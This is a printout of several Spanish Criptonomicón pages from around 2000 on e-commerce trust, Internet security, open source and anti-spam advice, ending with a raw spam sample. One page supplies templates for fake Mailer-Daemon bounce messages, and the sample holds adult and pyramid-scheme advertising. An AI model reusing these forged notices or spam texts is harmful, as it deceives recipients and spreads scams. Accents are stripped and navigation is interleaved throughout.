Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

Barreras al comercio electrnico


Recientemente ha aparecido publicada una encuesta sobre las barreras al
comercio electrnico, llevada a cabo por ITAA (Information Technology
Association of America) y Ernst & Young. Es un hecho que el comercio
electrnico no ha experimentado el crecimiento ni la aceptacin que el
entusiasmo inicial pronosticaba para el futuro inmediato. La encuesta tena
por cometido el analizar cules eran los mayores factores que actan de
freno a la expansin de la actividad comercial en Internet y de acuerdo con
los resultados obtenidos, la barrera ms importante es, cmo no, la falta de
confianza (sealada por el 62% de los encuestados). Esta desconfianza
hacia las nuevas tecnologas se articula en torno a tres temores
fundamentales:
La privacidad (60%), que los usuarios finales sienten amenazada en la
medida en que desconocen hasta qu punto los datos personales que
suministran a un servidor de comercio electrnico sern tratados de
forma confidencial. Quin le asegura al comprador que sus datos no
se almacenarn a la ligera, siendo accesibles fcilmente por un hacker
o un empleado desleal? Cmo saber que no se revenden a terceros?
La autenticacin (56%), que inquieta a los usuarios, quienes dudan de
si la persona con la que se comunican es verdaderamente quien dice
ser. Cuando se entra en los locales fsicos del Corte Ingls de la
ciudad, uno se siente seguro de que no hay trampa ni cartn. Sin
embargo, dada la relativa facilidad de falsificar una pgina web e
incluso un sitio web completo, cmo asegurarse de que se est
comprando en el Corte Ingls virtual y no en una imitacin fiel?
La seguridad global (56%), que preocupa a los usuarios, pues temen
que la tecnologa no sea suficientemente robusta para protegerles
frente a ataques y apropiaciones indebidas de informacin
confidencial, especialmente en lo que respecta a los medios de pago.
Es interesante el hecho de que de toda la actividad de compra, lo que
ms sigue preocupando es la operacin de pago, es decir, el momento

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros05.html (1 of 3) [25/10/2000 02:32:41 p.m.]

Barreras al comercio electrnico


Consejos prcticos

Referencias

Libro de Visitas

en el que el comprador se enfrenta a la ventana donde ha introducido


su nmero de tarjeta de crdito y duda a la hora de pulsar el botn de
Enviar Me timarn?, ser vctima de un fraude?, se pregunta el
usuario en el ltimo momento.
Estos temores, qu duda cabe, tienen su fundamento real y su solucin no
resulta trivial. En el primer caso, la tecnologa, y en concreto la criptografa,
ofrecen las herramientas necesarias para la proteccin frrea de la
informacin almacenada en las bases de datos corporativas, informacin
como listas de clientes, sus datos personales y de pago, listas de pedidos,
etc. Existen muchas tcnicas de control de acceso que hbilmente
implantadas garantizan el acceso a la informacin confidencial
exclusivamente a aquellos usuarios autorizados para ello. Ahora bien, se
han producido incidentes de servidores de comercio que almacenaron esta
clase de informacin sensible en ficheros accesibles va web por cualquier
navegante! Por lo tanto, aunque la criptografa provee de medios aptos,
depende en ltima instancia del comerciante el nivel de compromiso que
adopte respecto a la seguridad de los datos que conserva en sus ficheros y
su poltica de control de acceso.
As pues, ste es un temor bien presente y sin fcil respuesta. La tecnologa
nada tiene que decir si un comerciante decide vender su informacin a
terceros. La delgada lnea que protege la privacidad del usuario est
constituida en este caso por la integridad moral del comerciante. En estas
circunstancias, ms vale asegurarse antes de con quin se comercia.
En el segundo caso, la solucin inmediata que ofrece la criptografa viene de
la mano de los certificados digitales. La tecnologa de certificacin est
suficientemente madura como para autenticar adecuadamente a las partes
involucradas en una transaccin. La ms comnmente utilizada es SSL y a
pesar de la tan cacareada limitacin criptogrfica fuera de Norteamrica de
claves dbiles de 40 bits, lo cierto es que a la hora de autenticar a las partes,
principalmente al servidor, SSL funciona satisfactoriamente. Otro asunto es
si asegura o no la confidencialidad, cuestin ms que dudosa, si se tiene en
cuenta que una clave de 40 bits se rompe en cuestin de horas, con lo que
los datos por ella protegidos quedan al descubierto rpidamente. Otras
tecnologas emergentes, como SET, ofrecen mucha mayor confianza en este
campo y, de paso, dan solucin al primer problema de la privacidad. SET
permite autenticar a las partes involucradas en la transaccin de manera
completamente segura, sin restricciones criptogrficas debidas a absurdas
leyes de exportacin. Su mecanismo de firma dual garantiza adems que el
comerciante no conocer los datos de pago (nmero de tarjeta de crdito),
eliminando as la posibilidad de fraude por su parte. SET garantiza as que el
comerciante cobra por la venta y que el comprador no es estafado por el
comerciante ni por hackers. En los prximos meses se oir hablar ms de
SET, sin duda.
En cuanto al tercer temor, nuevamente la criptografa moderna y los

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros05.html (2 of 3) [25/10/2000 02:32:41 p.m.]

Barreras al comercio electrnico

productos de seguridad proporcionan las soluciones a los problemas. Otra


cuestin es: incorporan los servidores de comercio todas las medidas
necesarias para asegurar las transacciones con el usuario? En otras
palabras, la tecnologa est sobre el tapete y ofrece solucin tecnolgica a
los retos que se le presentan a la seguridad en el comercio electrnico, pero
se usa correctamente? Se usa en absoluto?
Por lo que parece, las verdaderas barreras al comercio electrnico no son
tanto tecnolgicas como humanas. Una vez ms, el eslabn ms dbil de la
cadena es de ndole personal, no tecnolgico.
Publicado en el Boletn del Criptonomicn #51.

Informacin adicional

Los que lo deseen pueden consultar el texto con los resultados de la encuesta.

Comercio electrnico

Otros artculos publicados


Se pueden leer otros artculos desde la pgina principal de Susurros desde la Cripta.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros05.html (3 of 3) [25/10/2000 02:32:41 p.m.]

Internet o no Internet?: Internet segura

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

Internet o no Internet?: Internet segura


Por qu los medios, cuando se menciona Internet, tendenciosamente la
relacionan con la pornografa infantil, los timos, los hackers, los robos de
nmeros de tarjetas de crdito, zulos de terroristas y un sin fin de horrores
parecidos? Es que nada bueno sale de Internet?
Bien es verdad que esas imgenes tienen su fundamento real: la pornografa
atrae ms visitantes que ningn otro tema, ha habido gente que ha sufrido
timos, los hackers atacan peridicamente sitios mundialmente conocidos
(NASA, CIA, etc.) y otros no tanto, ha habido quien comprob cmo su
nmero de tarjeta result comprometido y los terroristas pueden utilizar
Internet para transmitirse mensajes cifrados. Ahora bien, no se vende
pornografa en los quioscos? No se le tima a la gente en su propia casa?
No sufrimos a vndalos que rompen cristales, queman papeleras y
destruyen rboles? No se producen robos de tarjetas de crdito? No se
comunican los terroristas por telfono y por correo convencional?
Internet es un reflejo del mundo al que estamos acostumbrados, pero con
fronteras difusas, con reglas distintas y con valores antagnicos. Y esta
semblanza asusta. Todo lo nuevo provoca reacciones de oposicin en las
mentes anquilosadas en la tradicin, en el pasado y en la mediana. Internet
puede cambiar la forma de girar del mundo. Internet puede cambiar la forma
de trabajo. Internet puede cambiar las relaciones entre los individuos.
Prohibamos Internet, ms vale lo malo conocido (sobre todo si me va bien)
que lo bueno por conocer. Hagamos un operacin de desgaste y derribo,
minemos la confianza de la gente en esta novedosa tecnologa. Que la
desprecien, que la teman, que la ignoren.
Afortunadamente, la criptografa, una vez ms, se convierte en una valiosa
aliada que puede combatir las plagas que amenazan la libre expansin de
Internet. Gracias a las herramientas criptogrficas se puede conseguir
privacidad en las comunicaciones, integridad en las transacciones
comerciales, no repudio en los contratos, y muchas otras ventajas para el

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros02.html (1 of 3) [25/10/2000 02:32:42 p.m.]

Internet o no Internet?: Internet segura


Consejos prcticos

uso cotidiano de la Red.

Referencias

Usar o no usar Internet? Usarla, s, pero con seguridad. Ahora bien, qu


iniciativas se emprenden en nuestro pas en esta direccin?

Libro de Visitas

De manera poco alentadora, la Segunda Encuesta Mundial sobre Seguridad


Informtica realizada por Ernst & Young (que puede obtenerse en
www.eyoung.es) viene a poner de manifiesto que la seguridad en redes
informticas y en Internet es todava una asignatura pendiente dentro del
marco del tejido empresarial espaol. A pesar de que la direccin de las
empresas considera la seguridad como importante o muy importante, esta
preocupacin no se hace eco en la implantacin de medidas concretas ni en
el establecimiento de polticas de seguridad y planes de contingencia.
El aumento del uso de Internet ha sido espectacular (especialmente del
correo electrnico), a pesar de que su falta de seguridad es unnimemente
reconocida por todos sus usuarios y a despecho de la mala prensa que
inexplicablemente a veces recibe en los medios de gran difusin. A medida
que las compaas buscan mejorar su negocio desplegando sistemas
distribuidos y/o conectndose a Internet, las organizaciones de las
Tecnologas de la Informacin se ven forzadas a identificar, atender y
gestionar incidentes de seguridad y peligros relacionados cada vez ms
frecuentes. A la vista del nmero creciente de agujeros de seguridad y
ataques informticos, se ha tornado evidente y es comnmente aceptado
que el entorno de redes distribuidas, incluyendo por supuesto a Internet, est
plagada de amenazas a la seguridad.
Esta inseguridad est acarreando entre otras consecuencias el retraimiento
del comercio electrnico, al que se contempla como sospechoso en la
medida en que no se aumente la seguridad en las transacciones
comerciales. Sin embargo, no basta con reforzar la seguridad para llevar a
cabo la actividad comercial de la empresa en Internet, tambin es necesario
implantar medidas de seguridad para protegerse frente a las cinco
amenazas ms temidas segn los encuestados, listadas en orden
decreciente de seriedad: los hackers informticos, los usuarios no
autorizados, los proveedores de servicios, los antiguos empleados y los
usuarios autorizados desleales.
Con el fin de protegerse ante estas y otras amenazas, resulta de vital
importancia que toda compaa con activos informticos se conciencie de la
nueva revolucin Internet que est sacudiendo el mundo empresarial. La
seguridad de la informacin es una problema que los directivos deben
asumir como parte irrenunciable de sus responsabilidades, les guste o no.
No basta ya con subirse al tren de Internet, hay que hacerlo adems de
forma segura. No haga suya esa vieja mxima de la gestin de seguridad:
Cuando no ocurre nada, nos quejamos de lo mucho que gastamos en
seguridad. Cuando algo sucede, nos lamentamos de no haber invertido ms.

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros02.html (2 of 3) [25/10/2000 02:32:42 p.m.]

Internet o no Internet?: Internet segura

Ms vale dedicar recursos a la seguridad que convertirse en una estadstica.


Elaborado a partir de dos editoriales publicados en el Boletn del Criptonomicn #42 y
#46.

Otros artculos publicados


Se pueden leer otros artculos desde la pgina principal de Susurros desde la Cripta.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros02.html (3 of 3) [25/10/2000 02:32:42 p.m.]

El movimiento hacia el software abierto

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

El movimiento hacia el software abierto


Mientras no exista confianza, mientras los usuarios teman el fraude,
mientras se desconozcan los sistemas empleados, es difcil que el comercio
electrnico despegue. La transparencia se erige as en nico embajador de
un modelo de comercio que no termina de calar. En este panorama, nuevos
esfuerzos en el desarrollo de software abierto estn recibiendo su mximo
impulso, en un afn por arrojar luz donde otros buscan entenebrecer.
Bien es verdad que no todos disponen de la capacitacin tcnica ni del
tiempo para examinar el kernel de un sistema operativo en busca de fallos o
para evaluar la seguridad de un sistema de seguridad como PGP. Sin
embargo, lo verdaderamente fundamental en este movimiento de apertura y
cooperacin consiste precisamente en el hecho de ofrecer esa posibilidad,
esa libertad, en dejar las fuentes disponibles para el escrutinio pblico, lo
que permitir que el proceso de anlisis y solucin de fallos sea mucho ms
gil, ya que cualquier usuario es capaz, en principio, de adentrarse en las
lneas del programa fuente, hacer modificaciones, compilarlo y probarlo en s
u propia mquina, buscar debilidades, anunciarlas y publicitarlas, para que
otros miembros de la comunidad de usuarios puedan a su vez tratar de
reproducirlas en sus propios sistemas. De esta manera, los programas
crecen, nuevas funciones son aadidas, los agujeros de seguridad y fallos
de funcionamiento se corrigen, todo desarrollado en un clima de confianza,
donde los cambios ocurren a la vista de todos, donde todos pueden opinar y
apuntar sugerencias, aadir cdigo o mejorarlo.
Esta lnea de actuacin permite soslayar temibles amenazas como los
caballos de Troya o, por qu no, la sospecha de canales subliminales en
herramientas criptogrficas comercializadas por firmas como Microsoft o
Netscape. En la medida en que la industria informtica avance en el espritu
del software abierto, nuestros sistemas de ordenadores se volvern un
entorno ms familiar y seguro.
En esta situacin no cabe preguntarse cmo es posible que el software

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros01.html (1 of 2) [25/10/2000 02:32:42 p.m.]

El movimiento hacia el software abierto


Consejos prcticos

Referencias

gratuito y abierto contine prosperando, sino ms bien cmo es posible que


todava se siga comprando y utilizando productos y sistemas operativos
completamente cerrados y oscuros (u oscurecidos).
Publicado en el Boletn del Criptonomicn #33.

Libro de Visitas

Informacin adicional

The Cathedral and the Bazaar (87 KB), artculo de referencia sobre el
movimiento de software abierto, escrito por Eric S. Raymond
open source software resources tutorials information at open source IT

The Bazaar: The Technology of Cooperation

Free Software (Open Source)

Otros artculos publicados


Se pueden leer otros artculos desde la pgina principal de Susurros desde la Cripta.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros01.html (2 of 2) [25/10/2000 02:32:42 p.m.]

Por qu el correo basura es malo

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Por qu el correo basura es malo


En primer lugar, porque nos cuesta tiempo y dinero. Para aquellos
que se conectan va telefnica, los pasos siguen corriendo
mientras se lee o recibe su correo, lo cual, al recibir montones de
basura, les cuesta un dinero adicional. A un nivel superior, a los
proveedores de Internet y a los servicios en lnea les cuesta dinero
el transmitir el correo basura, coste que se aadir posteriormente
a la cuota de sus suscriptores. Una estrategia especialmente
deplorable consiste en conseguir durante unos das una cuenta de
prueba de un proveedor de Internet, enviar miles, millones de
mensajes, y abandonar la cuenta, dejando al proveedor
empantanado.

Introduccin

Por qu es malo

Cmo evitarlo

Truco casero

Recursos

El correo basura, como su nombre indica, es basura. Y a quin le interesa recibir


basura en su buzn? La inmensa mayora de los correos basura que son
indiscriminadamente enviados por la Red casi sin excepcin anuncian gneros sin el
ms mnimo valor, engaosos y ms o menos fraudulentos. Desde software para
enviar correos basura (autopromocin, no?), dietas y curas milagrosas, a
componentes sin marca de ordenadores, desde misteriosos mtodos para hacerse rico
en unos das, a sitios pornogrficos, y de ah a peor. Se trata de material demasiado
impresentable como para anunciarlo en medios respetables donde deberan pagar por
anunciarse.

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Los spammers (los que envan correo basura) son gentes sin escrpulos, que no
tienen reparos en congestionar servicios de acceso a Internet, como ocurri con
America On Line, que se dice lleg a recibir 1,8 millones de correos basura al da de
CyberPromotions. Suponiendo que una persona emplee diez segundos en identificar
y descartar de su buzn un correo como basura, significara que se desperdiciaran
5.000 horas de tiempo de conexin por da simplemente para deshacerse de esos
correos, y slo en AOL. Sumemos el tiempo de conexin en todo la Red. Nada en el
mundo cuesta tan poco al anunciante y tanto al destinatario.
Adems, en muchas ocasiones los contenidos rozan la ilegalidad, si es que no son
manifiestamente ilegales, como la pornografa infantil.

Susurros desde la Cripta

Podis aprender ms sobre los efectos perniciosos del spam en los informes de Bright
file:///C|/TEMP/criptonomicon/criptonomicon/spam/spammalo.html (1 of 2) [25/10/2000 02:33:05 p.m.]

Por qu el correo basura es malo


Consejos prcticos

Light Technologies.

Referencias

Libro de Visitas

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/spam/spammalo.html (2 of 2) [25/10/2000 02:33:05 p.m.]

Cmo evitar el correo basura (junk-mail o spam)

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

Cmo evitarlo
sta es una cuestin peliaguda, ya que, estrictamente hablando, no
existe forma humana (ni mecnica) de evitarlo por completo. Se
pueden apuntar una serie de sugerencias, que si bien no nos
impermeabilizarn al correo basura, s que al menos lo harn
disminuir significativamente.

Introduccin

Por qu es malo

Cmo evitarlo

Truco casero

Recursos
En los pocos casos en que dentro del correo basura aparezca la
direccin electrnica o postal, telfono, fax o lo que sea, del
spammer, se les puede contestar dicindoles que nos borren de sus
listas. Desgraciadamente, no suelen incluir estos datos, y las direcciones de correo (lo
que vemos en el campo De: de nuestro cliente de correo) suelen ser falsas o han
sido suplantadas (spoofing). Y lo que es peor. A veces responderles pidiendo que nos
eliminen equivale a confirmar que nuestra direccin de correo es vlida, con lo cual
pueden venderla a terceros, despus de haberse asegurado de que corresponde a un
usuario real. Por este ltimo motivo, puede ser una buena idea mandarles un correo
con un mensaje de error, como si esa direccin no existiese.

El siguiente paso es escribir al proveedor de acceso a Internet del spammer,


denunciando sus acciones, que puede que le hayan pasado inadvertidas al proveedor.
Sin embargo, no suele ser fcil averiguar quin es el proveedor, pues como queda
dicho, lo normal es que usen direcciones falsas. No obstante, si se bucea en las aguas
procelosas de las cabeceras de los correos, se puede encontrar el nombre de la
mquina que envi el correo, y con utilidades como el Whois se puede llegar a
obtener informacin sobre el proveedor.
Una forma de evitar que te llegue correo indeseado consiste en filtrar todo el correo
entrante. Muchos de los clientes de correo ms extendidos estn dotados de la
posibilidad de especificar direcciones de correo de las cuales no se aceptar ningn
mensaje. Por lo tanto, si alguna vez hemos recibido un correo basura de
alguien@unamquina.com, aadiremos en el filtro esta direccin y en el futuro no
recibiremos en nuestro buzn ms correo de ellos. Por desgracia, este mtodo no nos
protege de direcciones que desconocemos. Puedes encontrar una descripcin ms
detallada de cmo hacerlo en Outlook Express y en Netscape Messenger en la
seccin de Consejos prcticos.

file:///C|/TEMP/criptonomicon/criptonomicon/spam/evitarspam.html (1 of 3) [25/10/2000 02:33:05 p.m.]

Cmo evitar el correo basura (junk-mail o spam)


Consejos prcticos

Referencias

Libro de Visitas

Conscientes de las tcnicas de que se sirven los spammers para recolectar por la Red
direcciones de correo, lo ms inteligente es no dejar nuestra direccin en sus lugares
predilectos de rapia, como los grupos de noticias de Usenet y las listas de
distribucin. Para el primer caso, se puede eliminar nuestra direccin de la tpica
firma al final del mensaje o bien advertir de que se cambiar alguna letra, de modo
que los programas automticos de buitreo de direcciones las recojan alteradas y por
lo tanto inservibles. Por ejemplo:
email: <gonzalo@iec.csic.es-antispam>
(no olvide eliminar -antispam al responder)
Tambin debes cambiarlo en el campo De: y Responder a: de tu cliente de correo.
Ahora DejaNews ofrece un servicio gratis de correo antispam para las news.
Prubalo!
En el segundo caso, es importante asegurarse de que nuestra direccin de correo no
aparecer cuando se enva el comando para mostrar toda la gente suscrita a una lista.
Lo mejor es ponerse en contacto con el responsable de la lista y aclarar estos asuntos.
Por supuesto, otra manera para ocultar nuestra identidad al enviar correos o escribir
noticias es ayudarnos de los repetidores de correo annimos, que nos permiten
participar en las noticias de Usenet y escribir correos sin que aparezca nuestro
nombre o direccin de correo autntica. Tambin existe la posibilidad de emplear
alias, proporcionados por algunos proveedores de acceso a Internet.
Existen robots que buscan direcciones de correo por las pginas de Internet. Para
frustrar sus esfuerzos, se puede incluir la direccin de correo en una imagen, en
formato gif o jpg, de manera que cualquier lector humano sea capaz de reconocerla,
mientras que les pasar inadvertida a los robots automticos. Puedes ver un ejemplo
en mi pgina de copyright.
Si te disgusta que incluso los humanos que visitan tu pgina conozcan tu direccin de
correo, puedes no revelarla en absoluto. En su defecto, puedes crear un formulario
que habrn de rellenar para que enviarte sus comentarios, es decir, crear algo
parecido a los libros de visitas.
En ltimo lugar, para el que est obsesivamente interesado en no dejar ni rastro de su
direccin de correo en ningn lugar de la Red, sera conveniente que escribiese a los
numerosos servicios de directorios, en los que se pueden buscar nombres de persona
a partir de direcciones de correo y viceversa, como Yahoo! People Search,
WhoWhere, Bigfoot, Internet Address Finder, InfoSpace, etc. Su inconveniente,
claro est, es que no slo no nos encontrarn los spammers, sino ninguna otra
persona con intenciones ms benvolas. En fin, el precio de la intimidad.
Los ms atrevidos, no os perdis el siguiente truco anti-spam, el ms efectivo de
todos los mtodos descritos si recibes spam.

file:///C|/TEMP/criptonomicon/criptonomicon/spam/evitarspam.html (2 of 3) [25/10/2000 02:33:05 p.m.]

Cmo evitar el correo basura (junk-mail o spam)

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/spam/evitarspam.html (3 of 3) [25/10/2000 02:33:05 p.m.]

Truco casero para combatir el correo basura (junk-mail o spam)

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Truco casero
Muchos spammers incluyen una lnea en la que dicen que se
mande un reply a una cierta direccin si queremos que nos
eliminen de su lista de correo. En realidad se trata de una artimaa
para asegurarse de que nuestra direccin de correo es vlida y as
poder revenderla a otros spammers o seguir ellos mismos
envindonos spam. Es decir, que puede resultar poco
recomendable responder a una direccin desde la que hemos
recibido spam, ya que estamos confirmando la existencia de
nuestra cuenta de correo.

Mail Delivery Subsystem


Mail Administrator

Agujeros

y en el campo de direccin electrnica, algo como:

Spam

Mailer-Daemon@tudomino.es
Postmaster@tudomino.es

Anonimato

Correo seguro

Por qu es malo

Cmo evitarlo

Truco casero

Recursos

No basta pues con no responder, sino que se les puede enviar un mensaje de error
como si procediera del administrador o del demonio de correo. Para ello, podis
configurar vuestra cuenta de correo electrnico de la siguiente forma. En la seccin
de informacin del usuario, en el campo Nombre, podis poner alguno de los
siguientes:

Crashes

Remailers

Introduccin

Una vez que ya los has configurado, creas un correo nuevo y en el Asunto (Subject)
escribes alguno de los siguientes:
Returned mail: User unknown
Mail System Error - Returned Mail
Nondeliverable mail

Web seguro

y por ltimo, escribes lo siguiente como mensaje:


Susurros desde la Cripta

This Message was undeliverable due to the following


file:///C|/TEMP/criptonomicon/criptonomicon/spam/trucospam.html (1 of 3) [25/10/2000 02:33:06 p.m.]

Truco casero para combatir el correo basura (junk-mail o spam)


Consejos prcticos

Referencias

reason:
The following destination addresses were unknown (please
check
the addresses and re-mail the message):

Libro de Visitas

SMTP <tu direccin autntica> <-- ah ira tu direccin


autntica
Please reply to Postmaster@tudominio.es <-- ah ira tu
dominio autntico
if you feel this message to be in error.
Si adems la direccin que suministras como de postmaster es falsa, ni siquiera
contactarn con l.
Tambin puedes escribir:
Your message
To: <tu direccin>
Subject: El asunto del mensaje de spam que recibiste
Sent: Tue, 14 Jul 1998 17:52:50 +0200
did not reach the following recipient(s):
tudireccion@tudomino.es on Tue, 14 Jul 1998 17:46:48
+0200
The recipient name is not recognized
MSEXCH:IMS:Meridian:MERIDIAN.ES:SERVER 0 (000C05A6)
Unknown
Recipient
Body:
------Transcript of session follows ------<tu.direccion@de.correo>
The user's email name is not found.
De esta forma, es muy probable que cuando reciban tu correo de den de baja de la
lista, porque en caso contrario se exponen a enviar cientos de correos con direcciones
errneas y recibir esos cientos de respuestas con mensajes de error.
Como medida preventiva para no recibir spam y no recurrir a la tcnica anterior,
podis intentar las siguientes pautas:
Cambiar el campo direccin de correo en tu configuracin de correo, aadiendo

file:///C|/TEMP/criptonomicon/criptonomicon/spam/trucospam.html (2 of 3) [25/10/2000 02:33:06 p.m.]

Truco casero para combatir el correo basura (junk-mail o spam)

alguna letra o palabra al final de tu direccin:


gonzalo@iec.csic.es-antispam
ya que los robots especializados buscan en ese campo en primer lugar. Es decir, no
basta con escribir eso en el cuerpo de los mensajes que envas, tambin tienes que
aadirlo en tu propia direccin electrnica.
Por otra parte, la palabra "antispam" (o cualquier letra o palabra que se emplee)
deben ir detrs de la arroba @, ya que si se pone antes, los mensajes enviados a esa
direccin no te llegarn a ti porque esa direccin no existe, pero consumirn recursos
del servidor, que tendr que devolverlos, enviando un mensaje de error como esos
que hemos discutido al principio. As pues, al ponerlo detrs, ni siquiera le llega a tu
servidor, ya que tal servidor "no existe".
Disponis de un programa gratuito escrito por Albert Yale, Bounce Spam Mail, que
permite enviar mensajes falsos a los spammers como si procedieran del demonio de
correo, fingiendo que tu direccin de correo es errnea.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/spam/trucospam.html (3 of 3) [25/10/2000 02:33:06 p.m.]

Recursos sobre correo basura (junk-mail o spam)

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Recursos en la Red
Informacin

Abuso en el Correo Electrnico

Alakarga (en castellano)

The Spam Patrol

How To - Stop spam

How To - Can anyone stop spam?

"How to stop spam", by Christopher Barr

Why is spam bad?

What is spam?

Junkbusters Home Page

MailObscuro - Antispam

Bright Light Technologies

Crashes

Productos
Agujeros

Spam

SpamEx (versin de evaluacin gratis)

SpammerSlammer (totalmente gratis)

Bounce Spam Mail (totalmente gratis)

SpamKiller (versin de evaluacin gratis)

Spam Buster (versin shareware gratis)

Mail Guard (versin de evaluacin gratis)

SpamScan97 (versin shareware gratis)

MailJail 2.3 ()

EFilter 2.0 (totalmente gratis)

Spam Hater (totalmente gratis)

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/spam/recursosspam.html (1 of 2) [25/10/2000 02:33:06 p.m.]

Introduccin

Por qu es malo

Cmo evitarlo

Truco casero

Recursos

Recursos sobre correo basura (junk-mail o spam)


Consejos prcticos

Referencias

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.

Libro de Visitas

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/spam/recursosspam.html (2 of 2) [25/10/2000 02:33:06 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt
Your European Connection to Hot Beautiful XXX Live Girls!!!
Voted as the 1998 Best Adult Sites!
*LIVE GIRL SEX SHOWS!!!
* 10 FREE Live Video Feeds &
*FREE Erotic Stories!!
*1,000's of Free Pictures of
*Confessions!!!
*Plus Free Pictures of Teens
*Live Erotic Chat!!!
*Gambling
* Tons of free stuff!!!
So Much More we can't fit it

Chatrooms!!!
XXX Porn Stars!!
& Men!!!

on this page. See for yourself, go check it out!!!

You must be 21 or older.


http://www.nmsvr.com/~rubberdr
<A HREF="http://www.nmsvr.com/~rubberdr">AOL Click Here!</A>
If you take offense to this email & wish to be taken off our list,
simply e-mail us at: stanleyo@hotmail.com
We are sorry for any inconvience.
w.jp
From: rao6@toyom
************************************************************************************************
This is a "ONE-TIME MESSAGE" you were randomly selected to receive this.
You will be automatically deleted from this mailing list. ONLY REPLIES WILL BE KEPT.
There is no need to reply to remove, you will receive no further mailings from us.
NEW IMPROVED with FREE internet software!
FREE bulk e mail system, two FREE web sites
to use as you wish! one of your Free web sites is in this letter!, ongoing support
(optional), and a lot, lot more! all included!, this, all when you order all four
reports. That's worth $20 dollars alone ! PLUS act now and you will recived via e mail
from 50,000 To-100,000,000 !!! FREE filtered E-MAiL addresses!. ALL FOR YOU! This is not
a pyramid! This is NOT a chain letter, THIS WAS NOT SENT THROUGH THE POST OFFICE MAIL!
there is product, support, news letters and more! This is new and revised! ALL via e
mail!
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\$\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
you are about to make at least $50,000 USD In about 90 days or less!
Read the enclosed program...then read it again...then print it out to review.
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
Dear friend,
The enclosed information is something I almost let slip through my
